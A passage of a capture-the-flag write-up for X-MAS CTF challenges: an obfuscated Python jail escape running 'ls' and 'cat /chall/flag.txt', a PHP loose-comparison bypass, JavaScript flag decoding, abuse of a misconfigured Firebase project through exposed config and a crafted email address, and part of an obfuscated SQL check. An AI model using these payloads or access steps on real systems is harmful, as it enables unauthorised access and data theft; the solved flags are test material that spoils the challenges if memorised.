rs(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))))) = (ls,/chall)

getattr(time,'bad')((cat,/chall/flag.txt))

getattr(time,min(set(vars())))((getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(time,min(set(vars(time)))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(time,min(set(vars(time)))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(time,min(set(vars(time)))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c))))))

PHP Master

strpos only check lowercase 'e', so we can bypass with exponential.

<?php

include('flag.php');

$p1 = $_GET['param1'];
$p2 = $_GET['param2'];

if(!isset($p1) || !isset($p2)) {
    highlight_file(__FILE__);
    die();
}

if(strpos($p1, 'e') === false && strpos($p2, 'e') === false  && strlen($p1) === strlen($p2) && $p1 !== $p2 && $p1[0] != '0' && $p1 == $p2) {
    die($flag);
}

?>
http://challs.xmas.htsp.ro:3000/?param1=300&param2=3E2
X-MAS{s0_php_m4ny_skillz-69acb43810ed4c42}

Santa's consolation

We can get a flag with analyzing javascript.

function reverse(s) {
    s = atob(s).split("").reverse().join("");
    s = atob(s.replace('REDACTED0000', ''));
    s = s.split('|').map((c) => String.fromCharCode(c)).join("");
    s = decodeURI(s).split('[]').join("");
    s = s.replace(/a/g, "4").replace(/e/g, "3");
    s = s.replace(/i/g, "1").replace(/t/g, "7");
    s = s.replace(/z/g, "_")
    return `X-MAS{${s}}`;
}

reverse('MkVUTThoak44TlROOGR6TThaak44TlROOGR6TThWRE14d0hPMnczTTF3M056d25OMnczTTF3M056d1hPNXdITzJ3M00xdzNOenduTjJ3M00xdzNOendYTndFRGY0WURmelVEZjNNRGYyWURmelVEZjNNRGYwRVRNOGhqTjhOVE44ZHpNOFpqTjhOVE44ZHpNOEZETXh3SE8ydzNNMXczTnp3bk4ydzNNMXczTnp3bk13RURmNFlEZnpVRGYzTURmMllEZnpVRGYzTURmeUlUTThoak44TlROOGR6TThaak44TlROOGR6TThCVE14d0hPMnczTTF3M056d25OMnczTTF3M056dzNOeEVEZjRZRGZ6VURmM01EZjJZRGZ6VURmM01EZjFBVE04aGpOOE5UTjhkek04WmpOOE5UTjhkek04bFRPOGhqTjhOVE44ZHpNOFpqTjhOVE44ZHpNOGRUTzhoak44TlROOGR6TThaak44TlROOGR6TThSVE14d0hPMnczTTF3M056d25OMnczTTF3M056d1hPNXdITzJ3M00xdzNOenduTjJ3M00xdzNOenduTXlFRGY0WURmelVEZjNNRGYyWURmelVEZjNNRGYzRVRNOGhqTjhOVE44ZHpNOFpqTjhOVE44ZHpNOGhETjhoak44TlROOGR6TThaak44TlROOGR6TThGak14d0hPMnczTTF3M056d25OMnczTTF3M056d25NeUVEZjRZRGZ6VURmM01EZjJZRGZ6VURmM01EZjFFVE04aGpOOE5UTjhkek04WmpOOE5UTjhkek04RkRNeHdITzJ3M00xdzNOenduTjJ3M00xdzNOendITndFRGY0WURmelVEZjNNRGYyWURmelVEZjNNRGYxRVRNOGhqTjhOVE44ZHpNOFpqTjhOVE44ZHpNOFZETXh3SE8ydzNNMXczTnp3bk4ydzNNMXczTnp3WE94RURmNFlEZnpVRGYzTURmMllEZnpVRGYzTURmeUlUTThoak44TlROOGR6TThaak44TlROOGR6TThkVE84aGpOOE5UTjhkek04WmpOOE5UTjhkek04WlRNeHdITzJ3M00xdzNOenduTjJ3M00xdzNOendITXhFRGY0WURmelVEZjNNRGYyWURmelVEZjNNRGYza0RmNFlEZnpVRGYzTURmMllEZnpVRGYzTURmMUVUTTAwMDBERVRDQURFUg==')
X-MAS{s4n74_w1sh3s_y0u_cr4c1un_f3r1c17}

The Big Election Hack

First, the challenge site uses firebase. also so we can sign up some account with this info.

{
  apiKey: "AIzaSyDUOa5rtOnbVbF7T7ivUeBBR78L2tkODmY",
  authDomain: "official-wawanakwa-elections.firebaseapp.com",
  databaseURL: "https://official-wawanakwa-elections.firebaseio.com",
  projectId: "official-wawanakwa-elections",
  storageBucket: "official-wawanakwa-elections.appspot.com",
  messagingSenderId: "95856642143",
  appId: "1:95856642143:web:8b7fd33b805fadf104f3ea"
};

firebase.auth().createUserWithEmailAndPassword('test@03sunf.com', '123123');

After login that is registerd, we can explore collection stats. there are two data.

firebase.firestore().collection("stats").get().then((res) => {
    res.docs.map((doc) => {
        console.log(doc.id)
        firebase.firestore().collection("stats").doc(doc.id).get().then((res) => {
            console.log(res.data())
        })
    })
});
/*
{
  "winner":"[redacted]",
  "note_to_admin":"restrict access to the '/secret' collection",
  "winner_party":"[redacted]"
}
{
  "winner_party":"The Pink Party",
  "winner":"Chris McLean"
}
*/

Also we can get this message when we get secret collections.

firebase.firestore().collection("secret").get().then((res) => {
    res.docs.map((doc) => {
        console.log(doc.id)
        firebase.firestore().collection("secret").doc(doc.id).get().then((res) => {
            console.log(res.data())
        })
    })
});
/*
{
  "comment":"Backups are kept in the project's default bucket. Hail Hydra!"
}
*/

We are already known the storage address. so we can get a refference address.

# Listing objects in bucket
# Load 'https://www.gstatic.com/firebasejs/8.1.1/firebase-storage.js'
firebase.storage().ref().listAll().then((r) => {
    r.items.forEach((i) => {
        console.log(`${i.name} -> ${i.bucket}`)
    })
})
/*
ArrayOfPower:) -> official-wawanakwa-elections.appspot.com
WhyCanIWriteToThisDir?.bat -> official-wawanakwa-elections.appspot.com
index.js -> official-wawanakwa-elections.appspot.com
*/



# Extract refference url of index.js
r = firebase.storage().ref().child('index.js');
r.getDownloadURL().then((u) => {
  console.log(u)
});
/*
https://firebasestorage.googleapis.com/v0/b/official-wawanakwa-elections.appspot.com/o/index.js?alt=media&token=bf68a747-6948-43ac-b976-9fa1e74b2e3d
*/

Then we can get a source of cloud function setResults2020. we shoud register email that is included kuhi.to and that email must be verified.

const functions = require('firebase-functions');

exports.setResults2020 = functions.https.onCall((data, context) => {
	// make sure the user is a real elector
	if(!context.auth || context.auth.token.email === null || !context.auth.token.email.includes("kuhi.to") || !context.auth.token.email_verified) {
		return {success: false, message: "You're not an elector!"};
	}
	if(data.winner_party !== "The Orange Party") {
		return {success: false, message: "Nope"};
	}
	return {success: true, message: "Good job! The flag is: " + functions.config().the.flag};
});

We can request email verify.

firebase.auth().currentUser.sendEmailVerification()

After email verifycation, we can trigger cloud function and bypass !context.auth.token.email.includes("kuhi.to") with using email like dummykuhi.todummy@example.com.

firebase.functions().httpsCallable('setResults2020')({"data":{"winner_party":"The Orange Party"}}).then((r) => {
  console.log(r.data)
});

But server returns data like this.

{
  "result":{
    "success":false,
    "message":"I know this is kind of unfair, but you need to use an email address that was created before you started working on this challenge. If you think this is a mistake, PM yakuhito. If you're using a catch-all email address on your domain, choose one particular address from that domain that DOES NOT include 'kuhi.to' (e.g. person@domain.com) and bypass the checks using it."
  }
}

Maybe there is some logic check kuhi.to, but we can verify with email like $+-*&/=?^{}~_kuhi.to@03sunf.com and bypass logic logic that we couldn't check.

Message-ID: <00000000000015240105b67c2da1@google.com>
Date: Tue, 15 Dec 2020 08:02:12 +0000
Subject: Wawanakwa Election - Account Confirmation
From: yakuhito <noreply@official-wawanakwa-elections.firebaseapp.com>
To: $+-*&/=?^{}~_kuhi.to@03sunf.com
Content-Type: multipart/alternative; boundary="0000000000001523f405b67c2d9e"

--0000000000001523f405b67c2d9e
Content-Type: text/plain; charset="UTF-8"; format=flowed; delsp=yes

Hello,

Follow this link to verify your email address.

https://official-wawanakwa-elections.firebaseapp.com/__/auth/action?mode=verifyEmail&oobCode=ppYZRBDgtG0Xil4IYSuQzJVeMuqMGPp9EsBUt-XFuj4AAAF2ZWvLMQ&apiKey=AIzaSyDUOa5rtOnbVbF7T7ivUeBBR78L2tkODmY&lang=en

If you didn't ask to verify this address, you can ignore this email.

Thanks,

Your Official Wawanakwa Election App team

--0000000000001523f405b67c2d9e
X-MAS{oh_no_the_orange_party_has_the_nuclear_button-061b5d6be235263e}

World's most complex SQL Query

There is a SQL Query on the site.

SELECT   o 
FROM     ( 
                SELECT 0  v, 
                       '' o, 
                       0  pc 
                FROM   ( 
                              SELECT @pc:=0, 
                                     @mem:='', 
                                     @out:='') i 
                UNION ALL 
                SELECT v, 
                       CASE @pc 
                              WHEN 121 THEN 0 
                              WHEN 70 THEN @pc:=73 
                              WHEN 87 THEN IF(@x3 = 'a', 0, @pc:=89) 
                              WHEN 32 THEN @sp := @sp + 1 
                              WHEN 25 THEN @sp := @sp - 1 
                              WHEN 28 THEN @sp := @sp + 1 
                              WHEN 56 THEN @sp := @sp + 1 
                              WHEN 18 THEN IF(Bin(Ascii(@prt)) NOT LIKE '1111011', @pc:=89, 0) 
                              WHEN 126 THEN 0 
                              WHEN 17 THEN @prt := 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id = 5) 
                              WHEN 12 THEN IF( 
                                               ( 
                                               SELECT n 
                                               FROM FLAG 
                                               WHERE id = 2) = 'M', 0, @pc:=80) 
                              WHEN 11 THEN IF(@count = @targetsz, 0, @pc:=89) 
                              WHEN 103 THEN @sp := @sp + 1 
                              WHEN 41 THEN IF(Instr(@e, '?') > 0, 0, @pc:=43)
                              WHEN 81 THEN 
                                     ( 
                                            SELECT @x1 := n 
                                            FROM FLAG 
                                            WHERE id = 4) 
                              WHEN 49 THEN IF(Substr(@dat, @i - 1, 3) NOT LIKE Reverse('%tao%'), @pc:=124, 0)
                              WHEN 73 THEN 0 
                              WHEN 82 THEN 
                                     ( 
                                            SELECT @x2 := n 
                                            FROM FLAG 
                                            WHERE id = 5) 
                              WHEN 58 THEN @sp := @sp + 1 
                              WHEN 92 THEN 0 
                              WHEN 85 THEN 
                                     ( 
                                            SELECT @x3 := n 
                                            FROM FLAG 
                                            WHERE id = 6) 
                              WHEN 64 THEN IF( here
                                               ( 
                                               SELECT Field((Coalesce( 
                                                                       ( 
                                                                       SELECT Group_concat(n SEPARATOR '')
                                                                       FROM FLAG 
                                                                       WHERE id IN (17, 
                                                                                     Ascii(@e)/3-3, 
                                                                                     ( 
                                                                                            SELECT @xx := Ceiling(Ascii(@f)/3)+1))), '78')), 'ATT', 'BXX', 'ENN', 'FPP', 'VMM', 'PSS', 'ZEE', 'YDD', 'PPP')) = Floor(@xx / 4), 0, @pc:=89)
                              WHEN 95 THEN IF(@n = 0, 0, @pc:=99) 
                              WHEN 74 THEN @i := @i + 1 
                              WHEN 68 THEN 
                                     ( 
                                            SELECT @e := Concat_ws('AVION', 
                                                   ( 
                                                          SELECT n 
                                                          FROM FLAG 
                                                          WHERE id = @i))) 
                              WHEN 78 THEN @out := @ok 
                              WHEN 107 THEN @sp := @sp - 1 
                              WHEN 21 THEN @sp := @sp  + 1 
                              WHEN 83 THEN IF(@x1 = 'd', 0, @pc:=89) 
                              WHEN 104 THEN @mem:=Updatexml(@mem,'/m[$@sp]',Concat('<m>',@pc+2,'</m>'))
                              WHEN 31 THEN @mem:=Updatexml(@mem,'/m[$@sp]',Concat('<m>',@pc+2,'</m>'))
                              WHEN 122 THEN @sp := @sp - 1 
                              WHEN 102 THEN @mem:=Updatexml(@mem,'/m[$@sp]',Concat('<m>',@n - 1,'</m>'))
                              WHEN 45 THEN 0 
                              WHEN 93 THEN @get_arg_tmp := @sp-2 
                              WHEN 26 THEN @prt := 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id = 6) 
                              WHEN 86 THEN 
                                     ( 
                                            SELECT @x4 := n 
                                            FROM FLAG 
                                            WHERE id = 7) 
                              WHEN 69 THEN IF(instr( 
                                     ( 
                                            SELECT IF(Ord(@e) = @i ^ 0x4c, @f, CHAR(@xx*2.75))), '?') = '0', 0, @pc:=71)
                              WHEN 97 THEN @sp := @sp - 1 
                              WHEN 59 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',@pc+2,'</m>'))
                              WHEN 108 THEN @sp := @sp - 1 
                              WHEN 46 THEN @i := @i    - 1 
                              WHEN 115 THEN @n:=extractvalue(@mem,'/m[$@get_arg_tmp]') 
                              WHEN 100 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',@n,'</m>'))
                              WHEN 55 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',@prt,'</m>'))
                              WHEN 19 THEN @sp := 1 
                              WHEN 24 THEN @pc:=92 
                              WHEN 33 THEN @pc:=113 
                              WHEN 29 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',87,'</m>'))
                              WHEN 16 THEN IF((@prt sounds LIKE 'Soiii!'), 0, @pc:=80) 
                              WHEN 119 THEN IF(ascii(@n) = @compareto, @pc:=121, 0) 
                              WHEN 3 THEN @notok := 'Wrong.' 
                              WHEN 42 THEN @pc:=45 
                              WHEN 8 THEN IF(ascii(@e) ^ 32 = 120, 0, @pc:=89) 
                              WHEN 98 THEN @pc:=extractvalue(@mem,'/m[$@sp]') 
                              WHEN 50 THEN 
                                     ( 
                                            SELECT @i := group_concat(n SEPARATOR '') 
                                            FROM FLAG 
                                            WHERE id IN (14, 
                                                          16, 
                                                          19, 
                                                          22, 
                                                          25, 
                                                          32)) 
                              WHEN 91 THEN @pc:=126 
                              WHEN 117 THEN @compareto:=extractvalue(@mem,'/m[$@get_arg_tmp]') 
                              WHEN 34 THEN @sp := @sp - 2 
                              WHEN 84 THEN IF(@x2 = 'e', 0, @pc:=89) 
                              WHEN 37 THEN @i := 13 
                              WHEN 20 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',7,'</m>'))
                              WHEN 63 THEN IF(@rv = instr('t35t', 'm4ch1n3'), @pc:=80, 0) 
                              WHEN 53 THEN IF(strcmp( 
                                     ( 
                                            SELECT LEFT(REPLACE(unhex(REPLACE(hex(RIGHT(quote(mid(make_set(40 | 2,'Ook.','Ook?','Ook!','Ook?', 'Ook!','Ook?','Ook.'), 4)), 12)), '4F6F6B', '2B')), ',+', ''), 3)),
                                     ( 
                                            SELECT group_concat(n SEPARATOR '') 
                                            FROM FLAG 
                                            WHERE id > 28 
                                            AND    id < 32)) NOT LIKE '0', @pc:=89, 0) 
                              WHEN 111 THEN @sp := @sp - 1 
                              WHEN 6 THEN IF(@dat = 'X-MAS', @pc:=80, 0) 
                              WHEN 80 THEN 0 
                              WHEN 112 THEN @pc:=extractvalue(@mem,'/m[$@sp]') 
                              WHEN 120 THEN @rv := 0 
                              WHEN 90 THEN @out := @notok 
                              WHEN 61 THEN @pc:=113 
                              WHEN 43 THEN 0 
                              WHEN 30 THEN @sp := @sp  + 1 
                              WHEN 101 THEN @sp := @sp + 1 
                              WHEN 52 THEN IF( 
                                               ( 
                                               SELECT IF(substr(@dat, 
                                                      ( 
                                                             SELECT ceiling(ascii(ascii(@F))/2)), 3) =
                                                      ( 
                                                             SELECT name_const('TAO', 'SQL')), 1, 0)) = find_in_set(0,'f,e,e,d'), @pc:=124, 0)
                              WHEN 71 THEN 0 
                              WHEN 9 THEN IF( 
                                              ( 
                                              SELECT n 
                                              FROM FLAG 
                                              WHERE id = 1) = '-', 0, @pc:=89) 
                              WHEN 35 THEN IF(@rv = instr('xbar', 'foobar'), @pc:=80, 0) here
                              WHEN 62 THEN @sp := @sp - 2 
                              WHEN 2 THEN @ok := 'OK.' 
                              WHEN 51 THEN IF(hex(@i) = REPEAT('5F', 6), 0, @pc:=89) 
                              WHEN 88 THEN IF(@x4 = 'd', 0, @pc:=89) 
                              WHEN 109 THEN @n:=extractvalue(@mem,'/m[$@sp]') 
                              WHEN 10 THEN 
                                     ( 
                                            SELECT @count := count(*) 
                                            FROM FLAG) 
                              WHEN 1 THEN @strn := 'MySQL' 
                              WHEN 39 THEN 0 
                              WHEN 96 THEN @rv := 1 
                              WHEN 106 THEN @pc:=92 
                              WHEN 114 THEN @get_arg_tmp := @sp-3 
                              WHEN 47 THEN IF(@i > 10, @pc:=39, 0) 
                              WHEN 0 THEN @mem:=concat(@mem,REPEAT('<m></m>',50)) 
                              WHEN 94 THEN @n:=extractvalue(@mem,'/m[$@get_arg_tmp]') 
                              WHEN 60 THEN @sp := @sp + 1 
                              WHEN 99 THEN 0 
                              WHEN 123 THEN @pc:=extractvalue(@mem,'/m[$@sp]') 
                              WHEN 89 THEN 0 
                              WHEN 38 THEN @l := 0 
                              WHEN 113 THEN 0 
                              WHEN 36 THEN IF( 
                                               ( 
                                               SELECT elt(bit_length(bin(12))/32, BINARY(rtrim(concat(reverse(REPEAT(substr(regexp_replace(hex(weight_string(trim(ucase(to_base64(
                                                      ( 
                                                             SELECT concat( 
                                                                    ( 
                                                                           SELECT n 
